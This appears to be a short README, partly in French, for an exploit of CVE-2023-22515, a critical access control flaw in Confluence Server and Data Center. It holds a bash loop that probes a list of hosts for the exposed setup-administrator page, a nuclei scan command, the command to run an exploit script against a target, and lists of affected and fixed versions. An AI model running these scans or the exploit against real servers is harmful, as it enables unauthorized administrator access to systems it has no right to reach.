
CVE-2023-22515 - Broken Access Control Vulnerability in Confluence Data Center and Server
CVE-2023-22515, une vulnérabilité critique affectant les instances sur site de Confluence Server et Confluence Data Center, une vulnérabilité de contrôle d'accès cassé. Attlassian a attribué un score de base CVSS de 10.0.
cat file.txt| while read host do;do curl -skL "http://$host/setup/setupadministrator.action" | grep -i "<title>Setup System Administrator" && echo $host "is VULN";done
nuclei -u target -t CVE-2023-22515.yaml
sudo pip install -r requirements.txt
sudo python3 exploit.py --url [target]
8.0.0
8.0.1
8.0.2
8.0.3
8.0.4
8.1.0
8.1.1
8.1.3
8.1.4
8.2.0
8.2.1
8.2.2
8.2.3
8.3.0
8.3.1
8.3.2
8.4.0
8.4.1
8.4.2
8.5.0
8.5.1
8.3.3 ou ultérieure
8.4.3 ou ultérieure
8.5.2 (version de support à long terme) ou ultérieure